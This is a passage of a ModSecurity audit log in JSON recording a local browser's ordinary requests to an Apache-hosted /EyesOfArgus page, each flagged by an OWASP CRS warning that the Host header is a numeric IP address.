[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrQAAAAC\"]"],"stopwatch":{"p1":469,"p2":1129,"p3":76,"p4":268,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:28 --0400","transaction_id":"WRc43H8AAQEAABwQSB0AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc43H8AAQEAABwQSB0AAAAD\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":579,"p2":1152,"p3":55,"p4":344,"p5":58,"sr":41,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB4AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:25 GMT","ETag":"\"cca-54f6a973816fe-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1217","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc43X8AAQEAABwQSB4AAAAD\"]"],"stopwatch":{"p1":631,"p2":950,"p3":63,"p4":324,"p5":54,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB8AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:27 GMT","ETag":"\"295-54f6a974c6a29\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc43X8AAQEAABwQSB8AAAAD\"]"],"stopwatch":{"p1":434,"p2":944,"p3":51,"p4":141,"p5":55,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCAAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCAAAAAD\"]"],"stopwatch":{"p1":539,"p2":1169,"p3":50,"p4":238,"p5":51,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCEAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCEAAAAD\"]"],"stopwatch":{"p1":416,"p2":1009,"p3":48,"p4":251,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHcAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4-n8AAQEAABwRiHcAAAAE\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":872,"p2":1628,"p3":75,"p4":412,"p5":98,"sr":66,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHgAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:58 GMT","ETag":"\"cca-54f6a992c662d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1215","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4-n8AAQEAABwRiHgAAAAE\"]"],"stopwatch":{"p1":635,"p2":1316,"p3":88,"p4":465,"p5":115,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHkAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:00 GMT","ETag":"\"295-54f6a9943f572\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4-38AAQEAABwRiHkAAAAE\"]"],"stopwatch":{"p1":385,"p2":938,"p3":57,"p4":134,"p5":60,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHoAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHoAAAAE\"]"],"stopwatch":{"p1":411,"p2":883,"p3":59,"p4":242,"p5":51,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
